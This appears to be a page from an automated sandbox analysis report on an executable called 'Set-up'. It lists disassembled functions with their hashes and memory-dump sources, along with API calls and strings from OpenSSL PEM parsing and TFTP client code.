Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59421df81c78d6d540ca39e2d4779fe0e9d527c3aab442f8c88aec98e1d2645d
Instruction ID: 54a627e16375ccd9ecb01a6b855a582f554f6bced603a227245c5bd220f40127
Opcode Fuzzy Hash: 59421df81c78d6d540ca39e2d4779fe0e9d527c3aab442f8c88aec98e1d2645d
Instruction Fuzzy Hash: BAC17932909711DBC724CF18C4806AAFBE1FF84724F598A6EE8D697351D335E891CB92

Function 00B2C770 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 683224067c027944c6ca69fdbb718edbc9ffe4db7d7567d4de4577e7526fedca
Instruction ID: a60ff9a19f4ccd999e17a208607439e6dddf34ef3d632bb280e71a26a03e15fb
Opcode Fuzzy Hash: 683224067c027944c6ca69fdbb718edbc9ffe4db7d7567d4de4577e7526fedca
Instruction Fuzzy Hash: D0A1A431A001698FDB38DE29CC81BDE73E2EF89310F068665ED5D9F395EA30AD458791

Function 00DE0590 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac8b52aa0487153d87c6a76e5a1d8736065acdc235e19c0de04527858909fa8a
Instruction ID: 292bc49279b6f7e10ef57ddf8358d0b0517f50781ced3efb22458bdee8e5c16a
Opcode Fuzzy Hash: ac8b52aa0487153d87c6a76e5a1d8736065acdc235e19c0de04527858909fa8a
Instruction Fuzzy Hash: B2A1A0356083559BC708EF6ED4D052EBBE1ABD4310F588A2DF8D687395D6B0EC90CB91

Function 00B2C320 Relevance: .3, Instructions: 253COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: PerformanceQuery$CounterFrequency
String ID:
API String ID: 774501991-0
Opcode ID: 89ff97c679078441495010c89f434c54dcce07f486890356534c21dbdb54dbf0
Instruction ID: 79a75c42566c67176a70e242473a9056028e0873081bbff68d0c49b31f862150
Opcode Fuzzy Hash: 89ff97c679078441495010c89f434c54dcce07f486890356534c21dbdb54dbf0
Instruction Fuzzy Hash: 88C1E571914B419AD322DF39D881BEBB7E1BF99300F108A1DE9EE96241EB70B584CB51

Function 00DA66B0 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d0625db26d0674688a489d7695d7d15edd252d4499e9e2a5cb042b9942730d5
Instruction ID: 08d8fcb8428856f1f250b2f70f5e977b897738163e8a3abdfe6bd62424550724
Opcode Fuzzy Hash: 5d0625db26d0674688a489d7695d7d15edd252d4499e9e2a5cb042b9942730d5
Instruction Fuzzy Hash: 5A717735714706CFC714DE29C480A2AB3E5AF8A704F5D462CE9A68B3A5E730EC11CBA0

Function 00DC6730 Relevance: .2, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: c9c098c34c0450711febc0042e56accd0b503e8630afd4bcf8aebedc02a77174
Instruction ID: 167b65aaa31283e414d94edfdefdc8a032005d6a700afcb3b7e071f719fd9a23
Opcode Fuzzy Hash: c9c098c34c0450711febc0042e56accd0b503e8630afd4bcf8aebedc02a77174
Instruction Fuzzy Hash: B181D472D14B828BD3148F28C890BB6B7A0FFDA310F149B1EE8E657682E774D580C751

Function 00DC85A0 Relevance: .2, Instructions: 195COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35dd7c2079c1fa6b0087e2d2de5362958a200034a8dd1f6b3a61df2fc508b35e
Instruction ID: a3bc71542033114b9cacf8a1057907f25972ee3de3add6d4d7227e20580c9119
Opcode Fuzzy Hash: 35dd7c2079c1fa6b0087e2d2de5362958a200034a8dd1f6b3a61df2fc508b35e
Instruction Fuzzy Hash: 4E7103751042068BC7199F6CE0C4A69FBE1BF88310F29CB6DD9D98B342D634EC95EB90

Function 00DDA800 Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5b506c9d8ef60c1196b6751c9ec9814b419d642104004d7291babe28335ee3e
Instruction ID: 953f4e1828130c7a9bb5d7e8ab03f7e715eae1cb31c56aadfb50b6b6966222d9
Opcode Fuzzy Hash: e5b506c9d8ef60c1196b6751c9ec9814b419d642104004d7291babe28335ee3e
Instruction Fuzzy Hash: 4871DF715042168BC7199F6DE5D4169FBE1BF88300F2ACB6ED9898B342D234EC95CF92

Function 00BD4170 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3775dd632b4603a654caba90e5cbcb8b83cbcd176971500a57377c2fde6df80c
Instruction ID: ee86108fc7f50a510c50617eaa81bdbf61658faaadce88e87e4e1ba1fa540219
Opcode Fuzzy Hash: 3775dd632b4603a654caba90e5cbcb8b83cbcd176971500a57377c2fde6df80c
Instruction Fuzzy Hash: B2510372B092414BD7048E5CC8C026AFBE1EBAA324F2946BED49A9B342D3309C46C791

Function 00DDA610 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83db59486c18492124bd9af9a04ac40461035559c79e715ee1e288333a85c4a6
Instruction ID: 84c97af0bb6426d1214161c876aa7b26607ecc24888642619826f5c3af8982ee
Opcode Fuzzy Hash: 83db59486c18492124bd9af9a04ac40461035559c79e715ee1e288333a85c4a6
Instruction Fuzzy Hash: E6518F76A086259BC7189F19C1D0129FBF2BF88704F1AC67ED99967781C330AD64CBD2

Function 00DEA000 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
Instruction ID: 834fd84c8013915c49fb550f894f96416d9779f53891f3101e5ab80dfede939d
Opcode Fuzzy Hash: 43ca0627f881cf177445ab0957e0dd518c042ce74fa7e59b5b191a8113bb2889
Instruction Fuzzy Hash: 8531A23170875B4BC714FD6EC4C022AF6D3ABD8760F55C63DE589C3398E971AC4986A2

Function 00C584A0 Relevance: 60.4, APIs: 24, Strings: 16, Instructions: 382stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00C585B6
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ANY PRIVATE KEY), ref: 00C585CC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PARAMETERS), ref: 00C585E2
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,X9.42 DH PARAMETERS), ref: 00C585F8
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,DH PARAMETERS), ref: 00C5860A
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,X509 CERTIFICATE), ref: 00C58620
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CERTIFICATE), ref: 00C58634
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,NEW CERTIFICATE REQUEST), ref: 00C5864A
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CERTIFICATE REQUEST), ref: 00C5865C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CERTIFICATE), ref: 00C58672
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,TRUSTED CERTIFICATE), ref: 00C586A0
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS7), ref: 00C586BA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS #7 SIGNED DATA), ref: 00C586D0
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS7), ref: 00C586E2
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CMS), ref: 00C586FC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,PKCS7), ref: 00C58712
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,CMS), ref: 00C5872A
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,TRUSTED CERTIFICATE), ref: 00C58686

Part of subcall function 00C3CBC0: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00C17254,?,crypto/err/err_local.h,00000039,00000000,?,00040000,?,00C140BB,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00C3BD91), ref: 00C3CBD2

Strings

ENCRYPTED PRIVATE KEY, xrefs: 00C58740
PKCS7, xrefs: 00C586B4, 00C586DC, 00C5870C
CMS, xrefs: 00C586F6, 00C58724
PRIVATE KEY, xrefs: 00C58756, 00C58787
PARAMETERS, xrefs: 00C585DC, 00C587FB
PKCS #7 SIGNED DATA, xrefs: 00C586CA
NEW CERTIFICATE REQUEST, xrefs: 00C58644
CERTIFICATE, xrefs: 00C5862E, 00C5866C
ANY PRIVATE KEY, xrefs: 00C585C6
X509 CERTIFICATE, xrefs: 00C5861A
X9.42 DH PARAMETERS, xrefs: 00C585F2
crypto/pem/pem_lib.c, xrefs: 00C584F6, 00C58509, 00C5851F, 00C58545, 00C5855A, 00C58572, 00C588CE, 00C58935, 00C58948, 00C5895F, 00C58977, 00C5898C, 00C589A5, 00C589CB
Expecting: , xrefs: 00C58908
CERTIFICATE REQUEST, xrefs: 00C58656
TRUSTED CERTIFICATE, xrefs: 00C58680, 00C5869A
DH PARAMETERS, xrefs: 00C58604

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795222409.00000000010F4000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795237643.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_Set-up.jbxd

Similarity

API ID: strcmp$free
String ID: ANY PRIVATE KEY$CERTIFICATE$CERTIFICATE REQUEST$CMS$DH PARAMETERS$ENCRYPTED PRIVATE KEY$Expecting: $NEW CERTIFICATE REQUEST$PARAMETERS$PKCS #7 SIGNED DATA$PKCS7$PRIVATE KEY$TRUSTED CERTIFICATE$X509 CERTIFICATE$X9.42 DH PARAMETERS$crypto/pem/pem_lib.c
API String ID: 3401341699-4246700284
Opcode ID: a32e96b39d2e7e3796c611119f93bef65accdd11afa766f3c88173aa09cf0841
Instruction ID: fb0dcb289a0a81a46c167688a62d624411a4c28af3f02b17e3199e48e04c2c65
Opcode Fuzzy Hash: a32e96b39d2e7e3796c611119f93bef65accdd11afa766f3c88173aa09cf0841
Instruction Fuzzy Hash: 9DB104BAA4431267D6103922AC53FAB72989F6179FF08042CFD94B5183FF61D64C91B7

Function 00AD2010 Relevance: 51.2, APIs: 11, Strings: 18, Instructions: 414stringnetworkCOMMON

Download Yara Rule

APIs

_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00AD204A
_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00AD2068
WSAGetLastError.WS2_32 ref: 00AD20DE
recvfrom.WS2_32(?,?,?,00000000,?,00000080), ref: 00AD214D
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000), ref: 00AD2365
memchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000), ref: 00AD238F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00AD23B9
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 00AD241D
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 00AD24AD

Strings

got option=(%s) value=(%s), xrefs: 00AD23E8
TFTP error: %s, xrefs: 00AD228B
%s (%d), xrefs: 00AD254A
tsize parsed from OACK, xrefs: 00AD24D3
blksize is smaller than min supported, xrefs: 00AD2545
%s (%ld), xrefs: 00AD24D8, 00AD2557
invalid blocksize value in OACK packet, xrefs: 00AD251F
requested, xrefs: 00AD232C
tsize, xrefs: 00AD248D
invalid tsize -:%s:- value in OACK packet, xrefs: 00AD2573
Malformed ACK packet, rejecting, xrefs: 00AD2514
blksize, xrefs: 00AD23FC
blksize parsed from OACK, xrefs: 00AD2332
Received too short packet, xrefs: 00AD2169
%s (%d) %s (%d), xrefs: 00AD2337
Internal error: Unexpected packet, xrefs: 00AD22C4
server requested blksize larger than allocated, xrefs: 00AD2552
blksize is larger than max supported, xrefs: 00AD253C

Memory Dump Source

Source File: 00000000.00000002.1794627293.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1794612555.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F47000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1794998643.0000000000F8D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795038756.0000000000F8E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795053535.0000000000F90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795068452.0000000000F91000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795083665.0000000000F96000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795098630.0000000000F98000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1795191990.00000000010EF000.00000004.00000001.01000000.00000003.sdmpDownload File
